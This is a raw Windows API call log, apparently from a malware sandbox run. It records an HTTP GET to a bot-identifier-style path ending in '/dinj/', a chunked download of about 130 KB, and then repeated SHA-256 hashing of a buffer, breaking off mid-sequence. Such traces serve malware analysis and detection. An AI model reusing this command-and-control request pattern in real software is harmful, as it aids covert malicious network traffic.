	[0188.528] WinHttpOpenRequest (hConnect=0x227d8a0, pwszVerb="GET", pwszObjectName="/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/5/dinj/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x24a3b8
	[0188.528] WinHttpSetOption (hInternet=0x24a3b8, dwOption=0x1f, lpBuffer=0x127b44, dwBufferLength=0x4) returned 1
	[0188.528] WinHttpSendRequest (hRequest=0x24a3b8, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1
	[0190.386] WinHttpReceiveResponse (hRequest=0x24a3b8, lpReserved=0x0) returned 1
	[0190.387] WinHttpQueryHeaders (in: hRequest=0x24a3b8, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x127b34, lpdwBufferLength=0x127b30, lpdwIndex=0x0 | out: lpBuffer=0x127b34*, lpdwBufferLength=0x127b30*=0x4, lpdwIndex=0x0) returned 1
	[0190.387] WinHttpQueryDataAvailable (in: hRequest=0x24a3b8, lpdwNumberOfBytesAvailable=0x127b38 | out: lpdwNumberOfBytesAvailable=0x127b38*=0xf3e) returned 1
	[0190.387] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0xf40) returned 0x22e7cc0
	[0190.387] WinHttpReadData (in: hRequest=0x24a3b8, lpBuffer=0x22e7cc0, dwNumberOfBytesToRead=0xf3e, lpdwNumberOfBytesRead=0x127b30 | out: lpBuffer=0x22e7cc0*, lpdwNumberOfBytesRead=0x127b30*=0xf3e) returned 1
	[0190.387] WinHttpQueryDataAvailable (in: hRequest=0x24a3b8, lpdwNumberOfBytesAvailable=0x127b38 | out: lpdwNumberOfBytesAvailable=0x127b38*=0x2000) returned 1
	[0190.388] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22e7cc0, Size=0x2f40) returned 0x2690048
	[0190.388] WinHttpReadData (in: hRequest=0x24a3b8, lpBuffer=0x2690f86, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x127b30 | out: lpBuffer=0x2690f86*, lpdwNumberOfBytesRead=0x127b30*=0x2000) returned 1
	[0190.388] WinHttpQueryDataAvailable (in: hRequest=0x24a3b8, lpdwNumberOfBytesAvailable=0x127b38 | out: lpdwNumberOfBytesAvailable=0x127b38*=0x101c) returned 1
	[0190.389] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2690048, Size=0x3f60) returned 0x2690048
	[0190.389] WinHttpReadData (in: hRequest=0x24a3b8, lpBuffer=0x2692f86, dwNumberOfBytesToRead=0x101c, lpdwNumberOfBytesRead=0x127b30 | out: lpBuffer=0x2692f86*, lpdwNumberOfBytesRead=0x127b30*=0x101c) returned 1
	[0190.389] WinHttpQueryDataAvailable (in: hRequest=0x24a3b8, lpdwNumberOfBytesAvailable=0x127b38 | out: lpdwNumberOfBytesAvailable=0x127b38*=0x2000) returned 1
	[0190.390] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2690048, Size=0x5f60) returned 0x269c058
	[0190.390] WinHttpReadData (in: hRequest=0x24a3b8, lpBuffer=0x269ffb2, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x127b30 | out: lpBuffer=0x269ffb2*, lpdwNumberOfBytesRead=0x127b30*=0x2000) returned 1
	[0190.390] WinHttpQueryDataAvailable (in: hRequest=0x24a3b8, lpdwNumberOfBytesAvailable=0x127b38 | out: lpdwNumberOfBytesAvailable=0x127b38*=0x2000) returned 1
	[0190.391] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x269c058, Size=0x7f60) returned 0x269c058
	[0190.391] WinHttpReadData (in: hRequest=0x24a3b8, lpBuffer=0x26a1fb2, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x127b30 | out: lpBuffer=0x26a1fb2*, lpdwNumberOfBytesRead=0x127b30*=0x2000) returned 1
	[0190.392] WinHttpQueryDataAvailable (in: hRequest=0x24a3b8, lpdwNumberOfBytesAvailable=0x127b38 | out: lpdwNumberOfBytesAvailable=0x127b38*=0x2000) returned 1
	[0190.436] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x269c058, Size=0x9f60) returned 0x269c058
	[0190.436] WinHttpReadData (in: hRequest=0x24a3b8, lpBuffer=0x26a3fb2, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x127b30 | out: lpBuffer=0x26a3fb2*, lpdwNumberOfBytesRead=0x127b30*=0x2000) returned 1
	[0190.436] WinHttpQueryDataAvailable (in: hRequest=0x24a3b8, lpdwNumberOfBytesAvailable=0x127b38 | out: lpdwNumberOfBytesAvailable=0x127b38*=0x2000) returned 1
	[0190.437] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x269c058, Size=0xbf60) returned 0x269c058
	[0190.437] WinHttpReadData (in: hRequest=0x24a3b8, lpBuffer=0x26a5fb2, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x127b30 | out: lpBuffer=0x26a5fb2*, lpdwNumberOfBytesRead=0x127b30*=0x2000) returned 1
	[0190.437] WinHttpQueryDataAvailable (in: hRequest=0x24a3b8, lpdwNumberOfBytesAvailable=0x127b38 | out: lpdwNumberOfBytesAvailable=0x127b38*=0x2000) returned 1
	[0190.605] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x269c058, Size=0xdf60) returned 0x269c058
	[0190.605] WinHttpReadData (in: hRequest=0x24a3b8, lpBuffer=0x26a7fb2, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x127b30 | out: lpBuffer=0x26a7fb2*, lpdwNumberOfBytesRead=0x127b30*=0x2000) returned 1
	[0190.606] WinHttpQueryDataAvailable (in: hRequest=0x24a3b8, lpdwNumberOfBytesAvailable=0x127b38 | out: lpdwNumberOfBytesAvailable=0x127b38*=0x2000) returned 1
	[0190.606] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x269c058, Size=0xff60) returned 0x269c058
	[0190.607] WinHttpReadData (in: hRequest=0x24a3b8, lpBuffer=0x26a9fb2, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x127b30 | out: lpBuffer=0x26a9fb2*, lpdwNumberOfBytesRead=0x127b30*=0x2000) returned 1
	[0190.607] WinHttpQueryDataAvailable (in: hRequest=0x24a3b8, lpdwNumberOfBytesAvailable=0x127b38 | out: lpdwNumberOfBytesAvailable=0x127b38*=0x2000) returned 1
	[0190.666] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x269c058, Size=0x11f60) returned 0x269c058
	[0190.666] WinHttpReadData (in: hRequest=0x24a3b8, lpBuffer=0x26abfb2, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x127b30 | out: lpBuffer=0x26abfb2*, lpdwNumberOfBytesRead=0x127b30*=0x2000) returned 1
	[0190.666] WinHttpQueryDataAvailable (in: hRequest=0x24a3b8, lpdwNumberOfBytesAvailable=0x127b38 | out: lpdwNumberOfBytesAvailable=0x127b38*=0x2000) returned 1
	[0190.667] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x269c058, Size=0x13f60) returned 0x269c058
	[0190.668] WinHttpReadData (in: hRequest=0x24a3b8, lpBuffer=0x26adfb2, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x127b30 | out: lpBuffer=0x26adfb2*, lpdwNumberOfBytesRead=0x127b30*=0x2000) returned 1
	[0190.668] WinHttpQueryDataAvailable (in: hRequest=0x24a3b8, lpdwNumberOfBytesAvailable=0x127b38 | out: lpdwNumberOfBytesAvailable=0x127b38*=0x2000) returned 1
	[0191.114] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x269c058, Size=0x15f60) returned 0x269c058
	[0191.114] WinHttpReadData (in: hRequest=0x24a3b8, lpBuffer=0x26affb2, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x127b30 | out: lpBuffer=0x26affb2*, lpdwNumberOfBytesRead=0x127b30*=0x2000) returned 1
	[0191.115] WinHttpQueryDataAvailable (in: hRequest=0x24a3b8, lpdwNumberOfBytesAvailable=0x127b38 | out: lpdwNumberOfBytesAvailable=0x127b38*=0x2000) returned 1
	[0191.115] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x269c058, Size=0x17f60) returned 0x269c058
	[0191.116] WinHttpReadData (in: hRequest=0x24a3b8, lpBuffer=0x26b1fb2, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x127b30 | out: lpBuffer=0x26b1fb2*, lpdwNumberOfBytesRead=0x127b30*=0x2000) returned 1
	[0191.116] WinHttpQueryDataAvailable (in: hRequest=0x24a3b8, lpdwNumberOfBytesAvailable=0x127b38 | out: lpdwNumberOfBytesAvailable=0x127b38*=0x2000) returned 1
	[0191.116] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x269c058, Size=0x19f60) returned 0x269c058
	[0191.116] WinHttpReadData (in: hRequest=0x24a3b8, lpBuffer=0x26b3fb2, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x127b30 | out: lpBuffer=0x26b3fb2*, lpdwNumberOfBytesRead=0x127b30*=0x2000) returned 1
	[0191.116] WinHttpQueryDataAvailable (in: hRequest=0x24a3b8, lpdwNumberOfBytesAvailable=0x127b38 | out: lpdwNumberOfBytesAvailable=0x127b38*=0x2000) returned 1
	[0191.116] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x269c058, Size=0x1bf60) returned 0x2732590
	[0191.119] WinHttpReadData (in: hRequest=0x24a3b8, lpBuffer=0x274c4ea, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x127b30 | out: lpBuffer=0x274c4ea*, lpdwNumberOfBytesRead=0x127b30*=0x2000) returned 1
	[0191.119] WinHttpQueryDataAvailable (in: hRequest=0x24a3b8, lpdwNumberOfBytesAvailable=0x127b38 | out: lpdwNumberOfBytesAvailable=0x127b38*=0x2000) returned 1
	[0191.119] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2732590, Size=0x1df60) returned 0x2732590
	[0191.119] WinHttpReadData (in: hRequest=0x24a3b8, lpBuffer=0x274e4ea, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x127b30 | out: lpBuffer=0x274e4ea*, lpdwNumberOfBytesRead=0x127b30*=0x2000) returned 1
	[0191.119] WinHttpQueryDataAvailable (in: hRequest=0x24a3b8, lpdwNumberOfBytesAvailable=0x127b38 | out: lpdwNumberOfBytesAvailable=0x127b38*=0x2000) returned 1
	[0191.120] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2732590, Size=0x1ff60) returned 0x2732590
	[0191.120] WinHttpReadData (in: hRequest=0x24a3b8, lpBuffer=0x27504ea, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x127b30 | out: lpBuffer=0x27504ea*, lpdwNumberOfBytesRead=0x127b30*=0x2000) returned 1
	[0191.120] WinHttpQueryDataAvailable (in: hRequest=0x24a3b8, lpdwNumberOfBytesAvailable=0x127b38 | out: lpdwNumberOfBytesAvailable=0x127b38*=0x6c6) returned 1
	[0191.120] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2732590, Size=0x20620) returned 0x2732590
	[0191.120] WinHttpReadData (in: hRequest=0x24a3b8, lpBuffer=0x27524ea, dwNumberOfBytesToRead=0x6c6, lpdwNumberOfBytesRead=0x127b30 | out: lpBuffer=0x27524ea*, lpdwNumberOfBytesRead=0x127b30*=0x6c6) returned 1
	[0191.120] WinHttpQueryDataAvailable (in: hRequest=0x24a3b8, lpdwNumberOfBytesAvailable=0x127b38 | out: lpdwNumberOfBytesAvailable=0x127b38*=0x0) returned 1
	[0191.121] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263528) returned 1
	[0191.121] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x1000) returned 0x2690048
	[0191.121] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.121] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.121] CryptHashData (hHash=0x22b6940, pbData=0x2690048, dwDataLen=0x20, dwFlags=0x0) returned 1
	[0191.122] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.122] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263528
	[0191.122] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x263528, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x263528, pdwDataLen=0x1283b0) returned 1
	[0191.122] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.122] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.122] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.122] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.122] CryptHashData (hHash=0x22b6900, pbData=0x2690048, dwDataLen=0x40, dwFlags=0x0) returned 1
	[0191.122] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.122] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263aa0
	[0191.122] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x263aa0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x263aa0, pdwDataLen=0x1283b0) returned 1
	[0191.122] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.122] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.122] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.123] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.123] CryptHashData (hHash=0x22b6940, pbData=0x2690048, dwDataLen=0x60, dwFlags=0x0) returned 1
	[0191.123] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.123] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263a00
	[0191.123] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x263a00, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x263a00, pdwDataLen=0x1283b0) returned 1
	[0191.123] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.123] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.123] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.123] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.123] CryptHashData (hHash=0x22b6900, pbData=0x2690048, dwDataLen=0x80, dwFlags=0x0) returned 1
	[0191.123] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.123] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263a50
	[0191.123] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x263a50, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x263a50, pdwDataLen=0x1283b0) returned 1
	[0191.123] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.123] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.123] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.124] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.124] CryptHashData (hHash=0x22b6940, pbData=0x2690048, dwDataLen=0xa0, dwFlags=0x0) returned 1
	[0191.124] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.124] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263a78
	[0191.124] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x263a78, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x263a78, pdwDataLen=0x1283b0) returned 1
	[0191.124] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.124] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.124] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.124] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.124] CryptHashData (hHash=0x22b6900, pbData=0x2690048, dwDataLen=0xc0, dwFlags=0x0) returned 1
	[0191.124] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.124] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263af0
	[0191.124] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x263af0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x263af0, pdwDataLen=0x1283b0) returned 1
	[0191.124] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.124] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.124] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.125] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.125] CryptHashData (hHash=0x22b6940, pbData=0x2690048, dwDataLen=0xe0, dwFlags=0x0) returned 1
	[0191.125] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.125] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263b18
	[0191.125] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x263b18, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x263b18, pdwDataLen=0x1283b0) returned 1
	[0191.125] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.125] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.125] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.125] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.125] CryptHashData (hHash=0x22b6900, pbData=0x2690048, dwDataLen=0x100, dwFlags=0x0) returned 1
	[0191.126] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.126] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263b40
	[0191.126] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x263b40, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x263b40, pdwDataLen=0x1283b0) returned 1
	[0191.126] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.126] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.126] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.126] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.126] CryptHashData (hHash=0x22b6940, pbData=0x2690048, dwDataLen=0x120, dwFlags=0x0) returned 1
	[0191.126] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.126] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263b68
	[0191.126] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x263b68, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x263b68, pdwDataLen=0x1283b0) returned 1
	[0191.126] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.126] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.126] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.127] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.127] CryptHashData (hHash=0x22b6900, pbData=0x2690048, dwDataLen=0x140, dwFlags=0x0) returned 1
	[0191.127] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.127] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263b90
	[0191.127] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x263b90, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x263b90, pdwDataLen=0x1283b0) returned 1
	[0191.127] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.127] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.127] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.127] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.127] CryptHashData (hHash=0x22b6940, pbData=0x2690048, dwDataLen=0x160, dwFlags=0x0) returned 1
	[0191.127] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.127] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263bb8
	[0191.127] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x263bb8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x263bb8, pdwDataLen=0x1283b0) returned 1
	[0191.127] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.127] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.127] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.128] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.128] CryptHashData (hHash=0x22b6900, pbData=0x2690048, dwDataLen=0x180, dwFlags=0x0) returned 1
	[0191.128] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.128] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263be0
	[0191.128] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x263be0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x263be0, pdwDataLen=0x1283b0) returned 1
	[0191.128] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.128] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.128] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.128] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.128] CryptHashData (hHash=0x22b6940, pbData=0x2690048, dwDataLen=0x1a0, dwFlags=0x0) returned 1
	[0191.128] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.128] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263c08
	[0191.128] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x263c08, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x263c08, pdwDataLen=0x1283b0) returned 1
	[0191.128] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.128] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.128] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.129] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.129] CryptHashData (hHash=0x22b6900, pbData=0x2690048, dwDataLen=0x1c0, dwFlags=0x0) returned 1
	[0191.129] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.129] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263c30
	[0191.129] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x263c30, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x263c30, pdwDataLen=0x1283b0) returned 1
	[0191.129] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.129] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.129] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.129] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.129] CryptHashData (hHash=0x22b6940, pbData=0x2690048, dwDataLen=0x1e0, dwFlags=0x0) returned 1
	[0191.129] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.129] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263c58
	[0191.129] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x263c58, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x263c58, pdwDataLen=0x1283b0) returned 1
	[0191.129] CryptDestroyHash (hHash=0x22b6940) returned 1
